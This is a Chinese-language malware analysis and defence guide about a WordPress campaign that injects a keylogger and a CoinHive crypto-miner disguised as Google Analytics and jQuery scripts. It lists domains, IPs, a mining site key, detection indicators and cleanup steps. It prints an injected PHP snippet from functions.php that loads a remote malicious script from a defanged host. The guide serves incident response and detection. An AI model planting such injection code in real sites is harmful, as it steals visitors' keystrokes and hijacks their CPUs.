WordPress键盘记录器与加密货币挖矿恶意软件分析及防护指南

恶意软件概述

本教学文档详细分析了一种针对WordPress网站的多功能恶意软件，该恶意软件结合了键盘记录和加密货币挖矿功能，通过多个域名进行传播。

恶意域名演变

• 初始域名：cloudflare.solutions（已失效）
• 后续注册域名：
  • cdjs.online
  • cdns.ws
  • sdns.online
  • msdns.online

恶意脚本注入方式

注入位置

1. WordPress数据库的wp_posts表
2. 主题的functions.php文件

常见注入代码示例

function chmnr_klgr_enqueue_script() {
    wp_enqueue_script('chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false);
}

恶意脚本分析

1. 假Google Analytics脚本

路径示例：

• hxxps://cdjs[.]online/lib.js
• hxxps://cdns[.]ws/lib/googleanalytics.js?ver=...

功能：

• 加载其他三个恶意脚本：
  1. jquery-3.2.1.min.js（加密货币挖矿脚本）
  2. kl.js（键盘记录器）
  3. mnrstrtr.js（挖矿启动器）

2. 键盘记录器(kl.js)

特征：

• 通过WebSocket协议(wss://cdjs[.]online:8085/)发送用户输入数据
• 与之前cloudflare.solutions版本的键盘记录器功能相似

3. 加密货币挖矿脚本

伪装为jQuery文件：

• hxxps://cdns[.]ws/lib/jquery-3.2.1.min.js?v=1.013

特点：

• 使用CoinHive库进行门罗币挖矿
• 提供备用配置：当CoinHive服务器连接失败时，使用cdjs.online配置
• 站点密钥：lZnIoM7JAc6g0xBbWpUsVKSuLPBehT4s

服务器基础设施

使用的IP地址：

1. 185.209.23.219 (对应cdjs.online)
2. 185.14.28.10 (挖矿脚本和旧版键盘记录器)
3. 107.181.161.159 (对应cdns.ws和msdns.online)

感染清除指南

1. 删除恶意代码

• 检查并清理主题的functions.php文件
• 扫描wp_posts表中的注入代码

2. 安全措施

• 更改所有WordPress密码
• 更新所有服务器软件
• 更新所有第三方主题和插件

3. 额外防护

• 部署Web应用防火墙(WAF)
• 实施定期安全扫描

预防措施

1. 保持WordPress核心、主题和插件更新
2. 使用强密码并定期更换
3. 限制使用来源不明的主题和插件
4. 实施文件完整性监控
5. 定期备份网站数据

技术检测指标

可关注的恶意特征：

• 对上述域名的外联请求
• functions.php文件中的可疑函数
• 异常的WebSocket连接(端口8085)
• 异常的CPU使用率(可能表明挖矿活动)

通过以上详细分析和防护指南，网站管理员可以有效识别、清除并预防此类恶意软件的感染。